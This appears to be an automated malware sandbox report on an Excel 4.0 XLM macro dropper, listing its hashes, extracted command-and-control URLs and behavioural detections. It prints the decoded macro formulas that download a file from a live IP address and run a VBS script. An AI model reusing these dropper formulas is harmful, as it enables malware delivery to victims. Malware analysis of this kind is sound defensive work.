General

  • Target

    d9278155a74e1a3555b5ed2533836628

  • Size

    6KB

  • Sample

    231222-sr6zpahbal

  • MD5

    d9278155a74e1a3555b5ed2533836628

  • SHA1

    5d2d1e3401fe9039e6f4ca98ac3fe95375d36abb

  • SHA256

    f8385d3418d0f52735943186cbab4f3fe2991673e1f55c0dc19324109cae08f7

  • SHA512

    d2694e8f5aae8297d7ded31c0e7b58b4e93c2b40f7bb640dd8c0af87d880ace141ad26bd9a0dafe3a1d8e2ccec4a12e484a828f0fa76ca0544cedb84ccf496c8

  • SSDEEP

    192:NDShuS/brA2OmmfR28UhHFBFYuQb98yyRN4unDAQ+xoUapuB:NmuwM2wA1FY9b98y4i

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Extracted

Language
xlm4.0

Source           URLs
xlm40.dropper    http://46.17.98.187/index.php
xlm40.dropper    http://google.com/index.php

Extracted

Language
xlm4.0

Source           URLs
xlm40.dropper    http://46.17.98.187/index.php

Targets

    • Target

      d9278155a74e1a3555b5ed2533836628

    • Size

      6KB

    • MD5

      d9278155a74e1a3555b5ed2533836628

    • SHA1

      5d2d1e3401fe9039e6f4ca98ac3fe95375d36abb

    • SHA256

      f8385d3418d0f52735943186cbab4f3fe2991673e1f55c0dc19324109cae08f7

    • SHA512

      d2694e8f5aae8297d7ded31c0e7b58b4e93c2b40f7bb640dd8c0af87d880ace141ad26bd9a0dafe3a1d8e2ccec4a12e484a828f0fa76ca0544cedb84ccf496c8

    • SSDEEP

      192:NDShuS/brA2OmmfR28UhHFBFYuQb98yyRN4unDAQ+xoUapuB:NmuwM2wA1FY9b98y4i

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
